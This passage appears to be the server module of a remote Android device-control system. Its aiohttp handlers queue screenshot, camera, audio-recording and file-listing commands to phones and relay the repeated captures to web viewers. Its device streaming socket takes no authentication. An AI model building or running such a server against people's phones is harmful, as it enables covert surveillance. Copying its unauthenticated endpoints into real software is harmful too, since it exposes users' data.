   788→   788→        return json_response({"ok": False, "message": "Admin only"}, 403)
   789→   789→    
   790→   790→    try:
   791→   791→        body = await request.json()
   792→   792→    except:
   793→   793→        return json_response({"ok": False, "message": "Invalid JSON"}, 400)
   794→   794→    
   795→   795→    store.settings.update(body)
   796→   796→    await _save_json("settings.json", store.settings)
   797→   797→    
   798→   798→    return json_response({"ok": True})
   799→   799→
   800→   800→
   801→   801→async def api_web_unlink(request: web.Request) -> web.Response:
   802→   802→    session = get_auth_session(request)
   803→   803→    if not session:
   804→   804→        return json_response({"ok": False, "message": "Unauthorized"}, 401)
   805→   805→    
   806→   806→    device_id = request.match_info.get('device_id', '')
   807→   807→    success = await store.unlink_device(device_id, session['user_id'])
   808→   808→    
   809→   809→    if success:
   810→   810→        return json_response({"ok": True})
   811→   811→    return json_response({"ok": False, "message": "Device not found"}, 404)
   812→   812→
   813→   813→
   814→   814→async def api_web_logout(request: web.Request) -> web.Response:
   815→   815→    session = get_auth_session(request)
   816→   816→    if not session:
   817→   817→        return json_response({"ok": False, "message": "Not logged in"}, 401)
   818→   818→    
   819→   819→    token = request.headers.get('Authorization', '').replace('Bearer ', '')
   820→   820→    if token in store.sessions:
   821→   821→        del store.sessions[token]
   822→   822→    
   823→   823→    return json_response({"ok": True})
   824→   824→
   825→   825→
   826→   826→async def _save_json(name, data):
   827→   827→    from .store import _save_json as _sj
   828→   828→    await _sj(name, data)
   829→   829→
   830→   830→
   831→   831→# ─── User Management API (Admin) ──────────────────────────────
   832→   832→
   833→   833→async def api_web_users(request: web.Request) -> web.Response:
   834→   834→    session = get_auth_session(request)
   835→   835→    if not session or session['role'] != 'admin':
   836→   836→        return json_response({"ok": False, "message": "Admin only"}, 403)
   837→   837→    
   838→   838→    users = await store.list_users()
   839→   839→    # Remove password hashes from response
   840→   840→    safe_users = []
   841→   841→    for u in users:
   842→   842→        safe = dict(u)
   843→   843→        safe.pop('password_hash', None)
   844→   844→        safe_users.append(safe)
   845→   845→    
   846→   846→    return json_response({"ok": True, "users": safe_users})
   847→   847→
   848→   848→
   849→   849→async def api_web_create_user(request: web.Request) -> web.Response:
   850→   850→    session = get_auth_session(request)
   851→   851→    if not session or session['role'] != 'admin':
   852→   852→        return json_response({"ok": False, "message": "Admin only"}, 403)
   853→   853→    
   854→   854→    try:
   855→   855→        body = await request.json()
   856→   856→    except:
   857→   857→        return json_response({"ok": False, "message": "Invalid JSON"}, 400)
   858→   858→    
   859→   859→    email = body.get('email', '')
   860→   860→    username = body.get('username', '')
   861→   861→    password = body.get('password', '')
   862→   862→    role = body.get('role', 'user')
   863→   863→    
   864→   864→    if not email or not username or not password:
   865→   865→        return json_response({"ok": False, "message": "Missing required fields"}, 400)
   866→   866→    
   867→   867→    try:
   868→   868→        user = await store.create_user(email, username, password, role)
   869→   869→        safe = dict(user)
   870→   870→        safe.pop('password_hash', None)
   871→   871→        return json_response({"ok": True, "user": safe})
   872→   872→    except ValueError as e:
   873→   873→        return json_response({"ok": False, "message": str(e)}, 400)
   874→   874→
   875→   875→
   876→   876→async def api_web_delete_user(request: web.Request) -> web.Response:
   877→   877→    session = get_auth_session(request)
   878→   878→    if not session or session['role'] != 'admin':
   879→   879→        return json_response({"ok": False, "message": "Admin only"}, 403)
   880→   880→    
   881→   881→    user_id = request.match_info.get('user_id', '')
   882→   882→    if user_id == session['user_id']:
   883→   883→        return json_response({"ok": False, "message": "Cannot delete yourself"}, 400)
   884→   884→    
   885→   885→    success = await store.delete_user(user_id)
   886→   886→    if success:
   887→   887→        return json_response({"ok": True})
   888→   888→    return json_response({"ok": False, "message": "User not found"}, 404)
   889→   889→
   890→   890→
   891→   891→async def api_web_regenerate_code(request: web.Request) -> web.Response:
   892→   892→    session = get_auth_session(request)
   893→   893→    if not session:
   894→   894→        return json_response({"ok": False, "message": "Unauthorized"}, 401)
   895→   895→    new_code = await store.regenerate_permanent_code(session['user_id'])
   896→   896→    if _fb.firebase_connected:
   897→   897→        from .firebase_client import sync_permanent_code
   898→   898→        user = await store.get_user(session['user_id'])
   899→   899→        if user:
   900→   900→            await sync_permanent_code(user['email'], new_code, session['user_id'])
   901→   901→    return json_response({"ok": True, "code": new_code})
   902→   902→
   903→   903→
   904→   904→# ─── File Management API ──────────────────────────────────────
   905→   905→
   906→   906→async def api_web_files(request: web.Request) -> web.Response:
   907→   907→    session = get_auth_session(request)
   908→   908→    if not session:
   909→   909→        return json_response({"ok": False, "message": "Unauthorized"}, 401)
   910→   910→    
   911→   911→    device_id = request.query.get('device_id', '')
   912→   912→    
   913→   913→    # List active files for the user's devices
   914→   914→    files = []
   915→   915→    for fid, fmeta in store.files.items():
   916→   916→        if device_id and fmeta.get('device_id') != device_id:
   917→   917→            continue
   918→   918→        # Check ownership
   919→   919→        device = store.devices.get(fmeta.get('device_id', ''))
   920→   920→        if device and (session['role'] == 'admin' or device.get('owner_id') == session['user_id']):
   921→   921→            safe = dict(fmeta)
   922→   922→            safe.pop('path', None)
   923→   923→            files.append(safe)
   924→   924→    
   925→   925→    return json_response({"ok": True, "files": files})
   926→   926→
   927→   927→
   928→   928→async def api_web_list_files_device(request: web.Request) -> web.Response:
   929→   929→    """Send list_files command to device and return result."""
   930→   930→    session = get_auth_session(request)
   931→   931→    if not session:
   932→   932→        return json_response({"ok": False, "message": "Unauthorized"}, 401)
   933→   933→    
   934→   934→    device_id = request.query.get('device_id', '')
   935→   935→    path = request.query.get('path', '/storage/emulated/0/')
   936→   936→    
   937→   937→    if not device_id:
   938→   938→        return json_response({"ok": False, "message": "Missing device_id"}, 400)
   939→   939→    
   940→   940→    device = await store.get_user_device(session['user_id'], device_id)
   941→   941→    if not device:
   942→   942→        return json_response({"ok": False, "message": "Device not found"}, 404)
   943→   943→    
   944→   944→    queued = await store.queue_command(
   945→   945→        device_id=device_id,
   946→   946→        command="list_files",
   947→   947→        params={"path": path},
   948→   948→        requested_by=session['user_id'],
   949→   949→        source="web"
   950→   950→    )
   951→   951→    
   952→   952→    if _fb.firebase_connected:
   953→   953→        await push_command(device_id, {
   954→   954→            "id": queued['id'],
   955→   955→            "command": "list_files",
   956→   956→            "params": {"path": path},
   957→   957→            "created_at": queued['created_at'],
   958→   958→        })
   959→   959→    
   960→   960→    return json_response({"ok": True, "command": queued, "message": "Command queued"})
   961→   961→
   962→   962→
   963→   963→# ─── Streaming API ────────────────────────────────────────────
   964→   964→
   965→   965→async def api_stream_frame(request: web.Request) -> web.Response:
   966→   966→    session = get_auth_session(request)
   967→   967→    if not session:
   968→   968→        return json_response({"ok": False, "message": "Unauthorized"}, 401)
   969→   969→    
   970→   970→    device_id = request.match_info.get('device_id', '')
   971→   971→    stream_type = request.query.get('type', 'video')
   972→   972→    key = f"{device_id}:{stream_type}"
   973→   973→    
   974→   974→    frame = store.latest_frames.get(key)
   975→   975→    if not frame:
   976→   976→        return json_response({"ok": False, "message": "No frame available"}, 404)
   977→   977→    
   978→   978→    return json_response({
   979→   979→        "ok": True,
   980→   980→        "data": frame.get('data', ''),
   981→   981→        "timestamp": frame.get('timestamp', 0),
   982→   982→        "source": frame.get('source', ''),
   983→   983→    })
   984→   984→
   985→   985→
   986→   986→async def api_stream_status(request: web.Request) -> web.Response:
   987→   987→    session = get_auth_session(request)
   988→   988→    if not session:
   989→   989→        return json_response({"ok": False, "message": "Unauthorized"}, 401)
   990→   990→    
   991→   991→    streams = {}
   992→   992→    for key, info in store.jpeg_stream_info.items():
   993→   993→        if info.get('active'):
   994→   994→            streams[key] = info
   995→   995→    
   996→   996→    return json_response({"ok": True, "streams": streams})
   997→   997→
   998→   998→
   999→   999→async def api_stream_start(request: web.Request) -> web.Response:
  1000→  1000→    """Device notifies server that a stream started."""
  1001→  1001→    device_id, error = get_device_auth(request)
  1002→  1002→    if error:
  1003→  1003→        return json_response({"ok": False, "message": error}, 401)
  1004→  1004→    
  1005→  1005→    try:
  1006→  1006→        body = await request.json()
  1007→  1007→    except:
  1008→  1008→        body = {}
  1009→  1009→    
  1010→  1010→    stream_id = body.get('stream_id', '')
  1011→  1011→    stream_type = body.get('type', 'screen')
  1012→  1012→    
  1013→  1013→    store.jpeg_stream_info[device_id] = {
  1014→  1014→        "active": True,
  1015→  1015→        "type": stream_type,
  1016→  1016→        "stream_id": stream_id,
  1017→  1017→        "started_at": datetime.utcnow().isoformat(),
  1018→  1018→    }
  1019→  1019→    
  1020→  1020→    return json_response({"ok": True})
  1021→  1021→
  1022→  1022→
  1023→  1023→async def api_stream_stop(request: web.Request) -> web.Response:
  1024→  1024→    """Device notifies server that a stream stopped."""
  1025→  1025→    device_id, error = get_device_auth(request)
  1026→  1026→    if error:
  1027→  1027→        return json_response({"ok": False, "message": error}, 401)
  1028→  1028→    
  1029→  1029→    if device_id in store.jpeg_stream_info:
  1030→  1030→        store.jpeg_stream_info[device_id]['active'] = False
  1031→  1031→    
  1032→  1032→    return json_response({"ok": True})
  1033→  1033→
  1034→  1034→
  1035→  1035→async def api_jpeg_stream_start(request: web.Request) -> web.Response:
  1036→  1036→    """Start JPEG screenshot-based streaming (web/admin)."""
  1037→  1037→    session = get_auth_session(request)
  1038→  1038→    if not session:
  1039→  1039→        return json_response({"ok": False, "message": "Unauthorized"}, 401)
  1040→  1040→    
  1041→  1041→    try:
  1042→  1042→        body = await request.json()
  1043→  1043→    except:
  1044→  1044→        return json_response({"ok": False, "message": "Invalid JSON"}, 400)
  1045→  1045→    
  1046→  1046→    device_id = body.get('device_id', '')
  1047→  1047→    stream_type = body.get('type', 'screen')
  1048→  1048→    interval = body.get('interval', JPEG_STREAM_INTERVAL)
  1049→  1049→    
  1050→  1050→    if not device_id:
  1051→  1051→        return json_response({"ok": False, "message": "Missing device_id"}, 400)
  1052→  1052→    
  1053→  1053→    # Check if already streaming
  1054→  1054→    if device_id in store.jpeg_stream_tasks and not store.jpeg_stream_tasks[device_id].done():
  1055→  1055→        return json_response({"ok": False, "message": "Stream already active"}, 400)
  1056→  1056→    
  1057→  1057→    # Start JPEG stream loop
  1058→  1058→    async def jpeg_loop():
  1059→  1059→        cmd = "screenshot" if stream_type == "screen" else "front_camera"
  1060→  1060→        if stream_type == "back_camera":
  1061→  1061→            cmd = "back_camera"
  1062→  1062→        elif stream_type == "audio":
  1063→  1063→            cmd = "record_audio"
  1064→  1064→        
  1065→  1065→        store.jpeg_stream_info[device_id] = {
  1066→  1066→            "active": True,
  1067→  1067→            "type": stream_type,
  1068→  1068→            "interval": interval,
  1069→  1069→            "started_at": datetime.utcnow().isoformat(),
  1070→  1070→            "frame_count": 0,
  1071→  1071→        }
  1072→  1072→        
  1073→  1073→        while store.jpeg_stream_info.get(device_id, {}).get('active', False):
  1074→  1074→            try:
  1075→  1075→                queued = await store.queue_command(
  1076→  1076→                    device_id=device_id,
  1077→  1077→                    command=cmd,
  1078→  1078→                    params={},
  1079→  1079→                    requested_by=session['user_id'],
  1080→  1080→                    source="jpeg_stream"
  1081→  1081→                )
  1082→  1082→                
  1083→  1083→                if _fb.firebase_connected:
  1084→  1084→                    await push_command(device_id, {
  1085→  1085→                        "id": queued['id'],
  1086→  1086→                        "command": cmd,
  1087→  1087→                        "params": {},
  1088→  1088→                        "created_at": queued['created_at'],
  1089→  1089→                    })
  1090→  1090→                
  1091→  1091→                store.jpeg_stream_info[device_id]['frame_count'] = \
  1092→  1092→                    store.jpeg_stream_info[device_id].get('frame_count', 0) + 1
  1093→  1093→                
  1094→  1094→                await asyncio.sleep(interval)
  1095→  1095→            except asyncio.CancelledError:
  1096→  1096→                break
  1097→  1097→            except Exception as e:
  1098→  1098→                logger.error(f"JPEG stream error: {e}")
  1099→  1099→                await asyncio.sleep(5)
  1100→  1100→    
  1101→  1101→    store.jpeg_stream_tasks[device_id] = asyncio.create_task(jpeg_loop())
  1102→  1102→    return json_response({"ok": True, "message": "Stream started"})
  1103→  1103→
  1104→  1104→
  1105→  1105→async def api_jpeg_stream_stop(request: web.Request) -> web.Response:
  1106→  1106→    """Stop JPEG streaming."""
  1107→  1107→    session = get_auth_session(request)
  1108→  1108→    if not session:
  1109→  1109→        return json_response({"ok": False, "message": "Unauthorized"}, 401)
  1110→  1110→    
  1111→  1111→    try:
  1112→  1112→        body = await request.json()
  1113→  1113→    except:
  1114→  1114→        body = {}
  1115→  1115→    
  1116→  1116→    device_id = body.get('device_id', '')
  1117→  1117→    
  1118→  1118→    if device_id in store.jpeg_stream_info:
  1119→  1119→        store.jpeg_stream_info[device_id]['active'] = False
  1120→  1120→    
  1121→  1121→    # Send stop command
  1122→  1122→    if device_id in store.jpeg_stream_tasks and not store.jpeg_stream_tasks[device_id].done():
  1123→  1123→        store.jpeg_stream_tasks[device_id].cancel()
  1124→  1124→    
  1125→  1125→    return json_response({"ok": True, "message": "Stream stopped"})
  1126→  1126→
  1127→  1127→
  1128→  1128→# ─── WebSocket Handlers ───────────────────────────────────────
  1129→  1129→
  1130→  1130→async def ws_dashboard(request: web.Request) -> web.Response:
  1131→  1131→    """Dashboard real-time updates WebSocket."""
  1132→  1132→    token = request.query.get('token', '')
  1133→  1133→    session = store.validate_session(token)
  1134→  1134→    if not session:
  1135→  1135→        return web.Response(status=401, text="Unauthorized")
  1136→  1136→    
  1137→  1137→    ws = web.WebSocketResponse(heartbeat=30)
  1138→  1138→    await ws.prepare(request)
  1139→  1139→    store.dashboard_ws_clients.add(ws)
  1140→  1140→    
  1141→  1141→    try:
  1142→  1142→        # Send initial data
  1143→  1143→        stats = store.get_stats()
  1144→  1144→        devices = await store.get_user_devices(session['user_id'])
  1145→  1145→        await ws.send_json({
  1146→  1146→            "type": "init",
  1147→  1147→            "devices": devices,
  1148→  1148→            "stats": stats,
  1149→  1149→            "commands": COMMAND_REGISTRY,
  1150→  1150→            "categories": CMD_CATEGORIES,
  1151→  1151→        })
  1152→  1152→        
  1153→  1153→        async for msg in ws:
  1154→  1154→            if msg.type == WSMsgType.TEXT:
  1155→  1155→                if msg.data == "ping":
  1156→  1156→                    await ws.send_json({"type": "pong"})
  1157→  1157→                elif msg.data == "get_stats":
  1158→  1158→                    await ws.send_json({"type": "stats_update", "stats": store.get_stats()})
  1159→  1159→            elif msg.type in (WSMsgType.ERROR, WSMsgType.CLOSE):
  1160→  1160→                break
  1161→  1161→    except Exception:
  1162→  1162→        pass
  1163→  1163→    finally:
  1164→  1164→        store.dashboard_ws_clients.discard(ws)
  1165→  1165→    
  1166→  1166→    return ws
  1167→  1167→
  1168→  1168→
  1169→  1169→async def ws_stream(request: web.Request) -> web.Response:
  1170→  1170→    """Device streaming WebSocket."""
  1171→  1171→    device_id = request.query.get('device_id', '')
  1172→  1172→    stream_id = request.query.get('stream_id', '')
  1173→  1173→    
  1174→  1174→    ws = web.WebSocketResponse(heartbeat=10)
  1175→  1175→    await ws.prepare(request)
  1176→  1176→    
  1177→  1177→    key = f"{device_id}:{stream_id}"
  1178→  1178→    store.stream_connections[key] = {"ws": ws, "type": "device", "last_activity": time.time()}
  1179→  1179→    
  1180→  1180→    try:
  1181→  1181→        async for msg in ws:
  1182→  1182→            if msg.type == WSMsgType.BINARY:
  1183→  1183→                # Video/audio frame from device
  1184→  1184→                store.latest_frames[f"{device_id}:video"] = {
  1185→  1185→                    "data": msg.data if isinstance(msg.data, str) else "",
  1186→  1186→                    "timestamp": time.time(),
  1187→  1187→                    "source": "stream",
  1188→  1188→                }
  1189→  1189→                
  1190→  1190→                # Forward to any viewer
  1191→  1191→                for conn_key, conn in list(store.stream_connections.items()):
  1192→  1192→                    if conn.get('type') == 'viewer' and conn.get('target_stream') == stream_id:
  1193→  1193→                        try:
  1194→  1194→                            if conn.get('ws') and not conn['ws'].closed:
  1195→  1195→                                conn['ws'].send_bytes(msg.data)
  1196→  1196→                        except Exception:
  1197→  1197→                            pass
  1198→  1198→                
  1199→  1199→                store.stream_connections[key]['last_activity'] = time.time()
  1200→  1200→            
  1201→  1201→            elif msg.type == WSMsgType.TEXT:
  1202→  1202→                try:
  1203→  1203→                    data = json.loads(msg.data)
  1204→  1204→                    msg_type = data.get('type', '')
  1205→  1205→                    
  1206→  1206→                    if msg_type == 'config':
  1207→  1207→                        store.jpeg_stream_info[device_id] = data
  1208→  1208→                    
  1209→  1209→                    elif msg_type == 'frame':
  1210→  1210→                        # Base64 frame
  1211→  1211→                        frame_data = data.get('data', '')
  1212→  1212→                        if frame_data:
  1213→  1213→                            store.latest_frames[f"{device_id}:video"] = {
  1214→  1214→                                "data": frame_data,
  1215→  1215→                                "timestamp": time.time(),
  1216→  1216→                                "source": data.get('source', 'stream'),
  1217→  1217→                                "is_keyframe": data.get('is_keyframe', False),
  1218→  1218→                            }
  1219→  1219→                            # Forward to viewers
  1220→  1220→                            for conn_key, conn in list(store.stream_connections.items()):
  1221→  1221→                                if conn.get('type') == 'viewer' and conn.get('target_stream') == stream_id:
  1222→  1222→                                    try:
  1223→  1223→                                        if conn.get('ws') and not conn['ws'].closed:
  1224→  1224→                                            conn['ws'].send_json(data)
  1225→  1225→                                    except Exception:
  1226→  1226→                                        pass
  1227→  1227→                except json.JSONDecodeError:
  1228→  1228→                    pass
  1229→  1229→            
  1230→  1230→            elif msg.type in (WSMsgType.ERROR, WSMsgType.CLOSE):
  1231→  1231→                break
  1232→  1232→    except Exception:
  1233→  1233→        pass
  1234→  1234→    finally:
  1235→  1235→        store.stream_connections.pop(key, None)
  1236→  1236→        if device_id in store.jpeg_stream_info:
  1237→  1237→            store.jpeg_stream_info[device_id]['active'] = False
  1238→  1238→    
  1239→  1239→    return ws
  1240→  1240→
  1241→  1241→
  1242→  1242→async def ws_stream_viewer(request: web.Request) -> web.Response:
  1243→  1243→    """Viewer WebSocket for watching streams."""
  1244→  1244→    stream_id = request.query.get('stream_id', '')
  1245→  1245→    token = request.query.get('token', '')
  1246→  1246→    session = store.validate_session(token)
  1247→  1247→    if not session:
  1248→  1248→        return web.Response(status=401, text="Unauthorized")
  1249→  1249→    
  1250→  1250→    ws = web.WebSocketResponse(heartbeat=10)
  1251→  1251→    await ws.prepare(request)
  1252→  1252→    
  1253→  1253→    key = f"viewer_{stream_id}_{id(ws)}"
  1254→  1254→    store.stream_connections[key] = {
  1255→  1255→        "ws": ws,
  1256→  1256→        "type": "viewer",
  1257→  1257→        "target_stream": stream_id,
  1258→  1258→        "last_activity": time.time(),
  1259→  1259→    }
  1260→  1260→    
  1261→  1261→    try:
  1262→  1262→        async for msg in ws:
  1263→  1263→            if msg.type == WSMsgType.TEXT:
  1264→  1264→                try:
  1265→  1265→                    data = json.loads(msg.data)
  1266→  1266→                    # Forward control commands to device stream
  1267→  1267→                    for conn_key, conn in list(store.stream_connections.items()):
  1268→  1268→                        if conn.get('type') == 'device' and stream_id in conn_key:
  1269→  1269→                            try:
  1270→  1270→                                if conn.get('ws') and not conn['ws'].closed:
  1271→  1271→                                    conn['ws'].send_json(data)
  1272→  1272→                            except Exception:
  1273→  1273→                                pass
  1274→  1274→                except json.JSONDecodeError:
  1275→  1275→                    pass
  1276→  1276→            elif msg.type in (WSMsgType.ERROR, WSMsgType.CLOSE):
  1277→  1277→                break
  1278→  1278→    except Exception:
  1279→  1279→        pass
  1280→  1280→    finally:
  1281→  1281→        store.stream_connections.pop(key, None)
  1282→  1282→    
  1283→  1283→    return ws
  1284→  1284→
  1285→  1285→
  1286→  1286→# ─── Dashboard Push Loop ──────────────────────────────────────
  1287→  1287→
  1288→  1288→async def dashboard_push_loop():
  1289→  1289→    """Push stats updates to connected dashboard WebSockets."""
  1290→  1290→    while True:
  1291→  1291→        try:
  1292→  1292→            await asyncio.sleep(4)
  1293→  1293→            if not store.dashboard_ws_clients:
  1294→  1294→                continue
  1295→  1295→            
  1296→  1296→            stats = store.get_stats()
  1297→  1297→            dead = set()
  1298→  1298→            
  1299→  1299→            for ws in store.dashboard_ws_clients:
  1300→  1300→                try:
  1301→  1301→                    if ws.closed:
  1302→  1302→                        dead.add(ws)
  1303→  1303→                        continue
  1304→  1304→                    await ws.send_json({"type": "stats_update", "stats": stats})
  1305→  1305→                except Exception:
  1306→  1306→                    dead.add(ws)
  1307→  1307→            
  1308→  1308→            store.dashboard_ws_clients -= dead
  1309→  1309→        except asyncio.CancelledError:
  1310→  1310→            break
  1311→  1311→        except Exception:
  1312→  1312→            await asyncio.sleep(5)